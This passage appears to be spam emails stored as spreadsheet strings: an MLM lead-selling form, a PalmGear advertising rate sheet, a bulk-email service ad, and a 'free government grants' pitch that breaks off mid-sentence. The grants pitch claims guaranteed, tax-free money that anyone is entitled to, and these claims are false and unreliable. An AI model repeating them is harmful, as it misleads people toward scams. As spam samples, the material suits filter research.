               &lt;td bgColor=3D"#000000" width=3D"100%"&gt;
                 &lt;b&gt;&lt;font color=3D"#FF0000" size=3D"5"&gt;Here is what we hav=
 e
         to offer you:&lt;/font&gt;&lt;/b&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/tbody&gt;
         &lt;/table&gt;
         &lt;table border=3D"0" width=3D"100%"&gt;
           &lt;tbody&gt;
             &lt;tr&gt;
               &lt;td width=3D"78%"&gt;
                 &lt;b&gt;&lt;u&gt;NETWORK MARKETER OR GIFTER CONTACTS&lt;/u&gt;&lt;/b&gt;
                 &lt;ul&gt;
                   &lt;li&gt;&lt;b&gt;All Leads Guaranteed To Be Network Marketers / o=
 r
                     Gifters&lt;/b&gt;
                   &lt;li&gt;&lt;b&gt;Guaranteed To Be Current, Active and Experienced=
 &lt;/b&gt;
                   &lt;li&gt;&lt;b&gt;Leads, Have Either Responded To A Internet Quest=
 ionnaire, Or
                     Are Already On Our Contact List, Of Current, Active
                     Networkers, Open To Opportunity.&lt;/b&gt;
                   &lt;li&gt;&lt;b&gt;Leads Include:&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;[At Least]=
  Name, Phone, And Email&lt;/b&gt;&lt;/li&gt;
                 &lt;/ul&gt;
                 &lt;p&gt;&amp;nbsp;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/tbody&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;p align=3D"center"&gt;&lt;b&gt;***USE US AS A TOOL TO BUILD YOUR BUSINESS!!&amp;nbs=
 p; REFER
   AS MANY PEOPLE AS YOU CAN.&amp;nbsp; EARN A TRUE RESIDUAL INCOME BY THE
   DUPLICATION OF YOUR TEAM, CAUSE REMEMBER......&lt;/b&gt;&lt;/p&gt;
   &lt;table border=3D"0" width=3D"100%"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" bgcolor=3D"#000000" bordercolor=3D"#000000"&gt;
         &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#FF0000"&gt;[Remember] &lt;/font&gt;=
 &lt;font color=3D"#FFFFFF"&gt;&amp;nbsp;
         &lt;/font&gt;&lt;/b&gt;&lt;font color=3D"#FFFFFF" size=3D"3"&gt;&lt;b&gt;Your System Now
         Includes A Proven Lead System.&amp;nbsp; &lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font size=3D"=
 2" color=3D"#FFFFFF"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;
         &lt;/font&gt;&lt;font color=3D"#FF0000"&gt;&lt;font size=3D"2"&gt;[&lt;/font&gt;Remember]=
 &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;p&gt;____________________________________________________________________=
 _&lt;/p&gt;
   &lt;table border=3D"0" width=3D"100%"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%"&gt;
         &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#FF0000" size=3D"5"&gt;Replace=
 ment Policy
         [Our Leads Are Guaranteed]&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;ul&gt;
           &lt;li&gt;
             &lt;p align=3D"left"&gt;&lt;b&gt;Any Unusable Lead&amp;nbsp;&amp;nbsp; Ie. Missin=
 g Info,
             Invalid Info, Any Just Real Negative Response Towards You On =
 The
             Phone..... &lt;font color=3D"#ff0000"&gt;REPLACED&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
           &lt;/li&gt;
         &lt;/ul&gt;
         &lt;table border=3D"0" width=3D"100%"&gt;
           &lt;tr&gt;
             &lt;td width=3D"100%" bgcolor=3D"#000000" bordercolor=3D"#000000=
 "&gt;
               &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#ff0000"&gt;Replacement =
 Leads Given
               -&amp;nbsp; No Questions Asked.&amp;nbsp; Just Let Us Know What You=
  Need
               And We Will Get It Handled.&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#000000"&gt;PLEASE COMPLETE TH=
 E FOLLOWING FORM&amp;nbsp;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;table border=3D"1" width=3D"100%" bordercolor=3D"#000000" bgcolor=3D"#=
 000000"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%"&gt;
         &lt;table border=3D"0" width=3D"100%"&gt;
           &lt;tr&gt;
             &lt;td width=3D"20%" align=3D"right"&gt;&lt;b&gt;&lt;font size=3D"3" color=3D=
 "#FFFFFF"&gt;NAME&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
             &lt;td width=3D"20%" align=3D"left"&gt;
               &lt;p align=3D"left"&gt;&lt;font color=3D"#FFFFFF"&gt;&lt;input type=3D"te=
 xt" name=3D"Name" size=3D"20"&gt;&lt;/font&gt;&lt;/td&gt;
             &lt;td width=3D"20%" align=3D"right"&gt;&lt;b&gt;&lt;font size=3D"3" color=3D=
 "#FFFFFF"&gt;PHONE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
             &lt;td width=3D"20%"&gt;&lt;font color=3D"#FFFFFF"&gt;&lt;input type=3D"text=
 " name=3D"Phone" size=3D"20"&gt;&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width=3D"20%" align=3D"right"&gt;&lt;b&gt;&lt;font size=3D"3" color=3D=
 "#FFFFFF"&gt;EMAIL&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
             &lt;td width=3D"20%" align=3D"left"&gt;&lt;font color=3D"#FFFFFF"&gt;&lt;inp=
 ut type=3D"text" name=3D"Email" size=3D"20"&gt;&lt;/font&gt;&lt;/td&gt;
             &lt;td width=3D"20%" align=3D"right"&gt;&lt;b&gt;&lt;font size=3D"3" color=3D=
 "#FFFFFF"&gt;TIME
               TO CALL&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
             &lt;td width=3D"20%"&gt;&lt;font color=3D"#FFFFFF"&gt;&lt;input type=3D"text=
 " name=3D"Time2Call" size=3D"18"&gt;&lt;select size=3D"1" name=3D"TimeZone"&gt;
                 &lt;option&gt;PST&lt;/option&gt;
                 &lt;option&gt;MNT&lt;/option&gt;
                 &lt;option&gt;CST&lt;/option&gt;
                 &lt;option&gt;EST&lt;/option&gt;
                 &lt;option&gt;OTHER&lt;/option&gt;
               &lt;/select&gt;&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width=3D"20%" align=3D"right"&gt;&lt;b&gt;&lt;font size=3D"3" color=3D=
 "#FFFFFF"&gt;COMPANY
               YOU ARE WITH&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
             &lt;td width=3D"60%" align=3D"left" colspan=3D"3"&gt;&lt;font color=3D=
 "#FFFFFF"&gt;&lt;input type=3D"text" name=3D"Company" size=3D"50"&gt;&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width=3D"20%" align=3D"right"&gt;&lt;font color=3D"#FFFFFF"&gt;&lt;in=
 put type=3D"text" name=3D"DOWNLINE_MEMBERS" size=3D"13"&gt;&lt;/font&gt;&lt;/td&gt;
             &lt;td width=3D"60%" align=3D"left" colspan=3D"3"&gt;&lt;b&gt;&lt;font color=
 =3D"#FFFFFF"&gt;HOW
               MANY DOWNLINE MEMBERS DO YOU HAVE THAT MAY ALSO NEED LEADS?=
 &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;p align=3D"center"&gt;&lt;input type=3D"submit" value=3D"Submit" name=3D=
 "B1"&gt;&lt;input type=3D"reset" value=3D"Reset" name=3D"B2"&gt;&lt;/p&gt;
         &amp;nbsp;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;&lt;font color=3D"#000000"&gt;You hav=
 e received this
   Message because of a past Client/Service Relationship we had with you. =
 If this
   might be inaccurate, or you simply wish to be Removed from all future N=
 otices,
   then&lt;/font&gt;&lt;font color=3D"#FF0000"&gt;  &lt;a href=3D"mailto:removes@btamail.=
 net.cn?subject=3DRemove" target=3D"_blank"&gt;CLICK
   HERE&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;table border=3D"0" width=3D"100%"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" bgcolor=3D"#000000" bordercolor=3D"#000000"&gt;&lt;fon=
 t size=3D"5"&gt;&amp;nbsp;&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/form&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Limited Time Offer!
</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings from PalmGear.com!
 Developers,
 PalmGear.com is currently offering a 15% discount on all Advertising through the end of June! The cost have been dropped and discounts will be given if you would like to trade for Past Due Payment or if you pre-pay for the advertising. Please contact me if you have any questions or if you would like to get signed up!
 Below are the options and cost to advertise!
 Regards,
 Jake Divjak
 www.PalmGear.com
 jaked@palmgear.com
 Phone-817-271-9807 
 Web Banner Ads-
 All ad prices are based on 3 Month minimums, prepaid.
 Home page ads will be rotated with no more than 10 advertisers at one time.
 Software Search, Top 50 Monthly, Top 50 Downloads, The Essentials and Gears
 Choice and all software categories will be rotated with no more than 3
 advertisers at one time.
 Pricing is defined as follows, depending upon your association with
 PalmGear.com and the URL that you will direct customers to.
 Pricing  per month
 Homepage (10 Advertisers Max)  $1000
 Left Colum Badge Homepage $2000
 Homepage Product Images (3 rows, 4 images per row)PRICES VARY
 Top 50 (3 Advertisers Max)  $300
 Top 50 Monthly (3 Advertisers Max)  $300
 Essentials (3 Advertisers Max) $300
 Gears Choice (3 Advertisers Max) $300
 My PalmGear (3 Advertisers Max)  $200
 Developers (3 Advertisers Max)  $200
 Software Category Pages (3 Advertisers Max)  Cost and varies depending upon
 category
 Tips and Tricks (3 Advertisers Max)  $200
 Related Links (3 Advertisers Max)  $200
 Advertisements for product(s) that are sold by PalmGear.com with the ad
 directing customers to your product description page on PalmGear.com.
 receive these discounts.
 Ad Payment &amp; Placement
 Payment for all advertising must be made prior to placement and may be made
 either via check or credit card.
 Ad Specifications
 Top Banners - 468 x 60
 12K File Size maximum
 We currently will only accept Graphic Banner Ads, no forms, etc.
 Graphic files must be stored on our servers. All advertising will be taxed
 for this reason.
 Statistics
 Each advertiser can log in through the developer section, with their user
 name and password and the statistics for their banners will be viewable
 there.
 ----------------------------------------------------------------------------
 My PalmGear Subscriber E-Mail Blast
 Pricing 
 $1000  Currently at aprox. 115,000 Users
 How it works 
 With this advertising option, you can effectively reach all of the My
 PalmGear Subscribers that have requested new information and updates to be
 e-mailed to them. The process is as follows
 E-mail Blasts are sent out on the 15th of every month. These can be reserved
 in advance on a first-come, first-serve basis.
 All text will be sent to PalmGear.com for approval and then on the assigned
 day will be e-mailed to the My PalmGear Subscribers that have requested
 this.
 ----------------------------------------------------------------------------
 Product Confirmation E-Mail Blurb
 Pricing 
 $1000  Currently sending out aprox. 65,000
 How it works 
 For each individual software product that is ordered, a confirmation is
 e-mailed to the customer that details the information about that order. At
 the bottom of each e-mail, there is a space available for advertisers to put
 a short message about their product, company, etc. The process for this is
 as follows.
 Product Confirmation E-Mails are sent out with every software order
 registration. A company can reserve this option for a months period at a
 time. They will have exclusive right to that space for that month. Months
 can be reserved in advance on a first-come, first-serve basis.
 All text will be sent to PalmGear.com for approval and then on the first day
 of the month, that information will be attached to those e-mails.
 ----------------------------------------------------------------------------
 Shipping Insert
 Pricing 
 $0.10 per insertion  Currently sending out aprox 6000 per month
 How it works 
 For each order that is placed for shipped products, a shipping invoice is
 inserted into the shipment. There is the opportunity to include a preprinted
 insert into each of these. They would need to reference that the item(s) can
 be purchased at PalmGear. The advertiser is responsible for printing costs.
 (Only 2 per shipment)
 Regards,
 ,
 PalmGear.com 
 http://www.palmgear.com
 "The One Stop Source for your Palm OS Based Organizer!"
 and Handspring Visor Modules too at http://www.palmgear.com/hs !
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] THE TRUTH OF INTERNET MARKETING--A REALISTIC WAY OF MARKETING
</t>
  </si>
  <si>
    <t xml:space="preserve">We offer some of the best bulk e-mail prices on the Internet. We do all 
 the mailing for you. 
 You just provide us with the ad! It's that simple!
 prices start at   $200.00 for 1-million e-mails sent. 
 our target list start at $400.00 for 1-million e-mails sent. 
 We give you a free mllion for ordering within 2 days.  I can also send 
 you the names on cd w/sending tools.  
 So thats us mailing +
 the names on CD with tools.
 209-656-9143
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: This Weekend
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;/head&gt;
 &lt;center&gt;
 &lt;h1&gt;
 &lt;b&gt;&lt;font face="Arial Black"&gt;&lt;font color="#0000FF"&gt;&lt;font size=+2&gt;&amp;nbsp;
 Free Personal and Business Grants&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h1&gt;&lt;/center&gt;
 &lt;p&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER=0 CELLSPACING=0 CELLPADDING=10 WIDTH="419" BGCOLOR="#0000FF" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="397" BGCOLOR="#FFFF00"&gt;
 &lt;center&gt;
 &lt;h2&gt;
 &lt;font face="Arial Narrow"&gt;" Qualify for &lt;u&gt;at least&lt;/u&gt; $25,000 in free
 grants money - Guaranteed! "&lt;/font&gt;&lt;/h2&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;center&gt;
 &lt;h3&gt;
 &lt;font face="Arial"&gt;&lt;font size=+0&gt;Each day over One Million Dollars in Free
 Government&lt;br&gt;
 Grants&amp;nbsp; is given away to people just like you for a wide&lt;br&gt;
 variety of Business And Personal Needs&lt;/font&gt;&lt;/font&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Dear Grant Seeker,&lt;/font&gt;&lt;/font&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;In a moment, I'll tell you
 exactly &lt;b&gt;HOW &amp;amp; WHERE&lt;/b&gt; to get Grants. This &lt;b&gt;MONEY&lt;/b&gt; has to
 be given away, &lt;b&gt;WHY&lt;/b&gt; not to &lt;b&gt;YOU?&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You may be thinking, "How
 can I get some of this Free Grants Money"&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Maybe you think it's impossible
 to get free money?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Let me tell you it's not
 impossible! It's a fact, ordinary people and businesses all across the
 United States are receiving millions of dollars from these Government and
 Private Foundation's everyday.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Who Can Apply?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;ANYONE&lt;/b&gt; can apply
 for a Grant from 18 years old and up!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Grants from $500.00 to $50,000.00
 are possible! &lt;b&gt;GRANTS&lt;/b&gt; don't have to be paid back,
 &lt;b&gt;EVER! &lt;/b&gt;Claim
 your slice of the &lt;b&gt;FREE&lt;/b&gt; American Pie.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This money is not a loan,
 Trying to get money through a conventional bank can be very time consuming
 and requires a lot of paperwork, only to find out that you've been denied.
 These Government Agencies don't have to operate under the same stringent
 requirements that banks do.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You decide how much money
 you need, as long as it's a lawful amount and meets with the Government
 Agencies criteria, the money is yours to keep and never has to be repaid.
 This money is non taxable &amp;amp; interest free.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;None of these programs require
 a credit check, collateral, security deposits or co-signers, you can apply
 even if you have a bankruptcy or bad credit, it doesn't matter, you as
 a tax payer and U.S. citizen are entitled to this money.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;There are currently over
 1,400 Federal Programs, 24,000 State Programs, 30,000 Private Foundations
 and 20,000 Scholarship Programs available.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This year over $30 Billion
 Dollars In Free personal and business Government Grants Money will be given
 away by Government Grants Agencies.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER CELLSPACING=0 CELLPADDING=3 WIDTH="80%" BORDERCOLOR="#ffcc66" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="100%"&gt;
 &lt;center&gt;
 &lt;h3&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;&lt;font size=+0&gt;Government Personal
 and Business Grants Facts:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Over 20 Million People Get Government
 Money Every Year:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;ul&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;1,000,000 entrepreneurs get money
 to start or expand a business&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;4,000,000 people get money to invest
 in real estate&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;6,000,000 people get money to go
 to college&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;10,000,000 people get free help and
 training for a better job&lt;/font&gt;&lt;/font&gt;&lt;/ul&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;h2&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Getting Business
 Grants&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Anyone thinking about going
 into business for themselves, or wanting to expand an existing business
 should rush for the world's largest "one-stop-money-shop" where FREE business
 grants to start or expand a business is being held for you by the Federal
 Government.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;It
 sounds absolutely incredible that people living right here in the United
 States of America wouldn't know that each year the world's largest source
 of free business help delivers:&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;ul&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Over $30 billion dollars in free
 business grants and low-interest loans;&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;over one-half trillion dollars in
 procurement contracts; and&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;over $32 billion dollars in FREE
 consulting and research grants.&lt;/font&gt;&lt;/font&gt;&lt;/ul&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;With an economy that remains
 unpredictable, and a need for even greater economic development on all
 fronts, the federal government is more willing than it ever has been before
 to give you the money you need to own your own business and become your
 own boss!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;In
 spite of the perception that people should not look to the government for
 help, the great government give-away programs have remained so incredibly
 huge that if each of the approximately 8 million businesses applied for
 an equal share, they would each receive over $70,000.&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Most
 people never apply for FREE Business Grants because they somehow feel it
 isn't for them, feel there's too much red-tape, or simply don't know who
 to contact.The fact is, however, that people from all walks of life do
 receive FREE GRANTS MONEY and other benefits from the government, and you
 should also.&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;h2&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Government Grants
 for Personal Need&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Help to buy a new home for
 low income families, repair your home, rent, mortgage payments, utility
 bills, purchase a new car, groceries, childcare, fuel, general living expenses,
 academic tutoring, clothing, school supplies, housing assistance, legal
 services, summer camp, debts, music lessons, art lessons, any extracurricular
 activities, pay bills for senior citizens, real estate taxes, medical expenses
 and general welfare. If you or someone you know suffered a fire lose there
 are programs available to help in replacing necessities.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;h2&gt;
 &lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Scholarships And
 Grants For Education&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Grant Money for preschool
 children and nursery school education, private, primary and secondary schools,
 men and women to further their education, scholarships for athlete's, business
 management, engineering, computer science, medical school, undergraduate,
 graduate, professional, foreign studies and many more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;h3&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Here's How You
 Can Get Free Grants&lt;br&gt;
 In The Shortest Time Possible&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Once you know how and where
 to apply for a specific Free Grant, results are almost inevitable. The
 government wants to give away this money. . . it is under congressional
 mandate to do so! These funds are made available to help you, the tax payer.
 All that's required from you is the proper presentation of your grant request.
 That's all.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;Announcing...&lt;/font&gt;&lt;/font&gt;
 &lt;center&gt;
 &lt;h3 STYLE="margin-left: 1cm; margin-right: 1cm; margin-top: 0cm"&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#CC0000"&gt;&lt;font size=-1&gt;"The Complete
 Guide To Government Grants"&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Forget just about everything
 you've seen or heard about government grants. What I've done is put together
 a complete blueprint for researching, locating and obtaining government
 grants. "The Complete Guide To Government Grants" is the most comprehensive
 tool for obtaining free grant money, and it comes in an Electronic book&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;(e-book) format, meaning you can
 download and start using it minutes after you order.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;The
 Complete Guide to Government Grants will provide you with access to thousands
 of grant and loan sources, with step by step instructions to proposal writing
 and contact procedures.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;In the Complete Guide to Government
 Grants you'll find:&lt;/font&gt;&lt;/font&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Step by step guidelines
 to applying for government grants&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to over 1,400
 grant, loan and assistance programs offered by the U.S. federal government.
 All you need to do is Click &amp;amp; Find your program from the detailed categorized
 listings&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to thousands
 of resources of state specific grant programs&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Name, phone number and address
 of an expert in your state that will answer your grant related questions
 and help you with the grant application... free of charge&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Online directory of government
 supported venture capital firms&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A unique search tool that
 will allow you to generate a customized listing of recently announced grant
 programs&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Government funding programs
 for small businesses&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Top 100 government programs
 (based on number of inquiries), discover what are the most sought after
 government grants and assistant programs. Claim your slice of the &lt;b&gt;FREE&lt;/b&gt;
 American Pie&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Online Directory of federal
 and state resources for government scholarships and grants for education&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Step by step guidelines
 to locating grants, loans and assistant programs for starting a new business
 or expanding an existing one&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to get free small business
 counseling and expert advice courtesy of the US government&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Government grants application
 forms&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to thousands
 of government grants programs covering: small businesses, home improvement,
 home buying and homeownership, land acquisition, site preparation for housing,
 health, assistance and services for the unemployed, job training, federal
 employment, education, and much much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to develop and write
 grant proposals that get results&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;...Plus much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Complete Guide to Government
 Grants is so comprehensive, it provides you with direct access to practically
 every source of FREE government grants money currently available.&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;If you're an American citizen
 or resident, you are entitled to free grant money ranging from $500 to
 $250,000 or more. If you are Black you have already qualified for 15 programs,
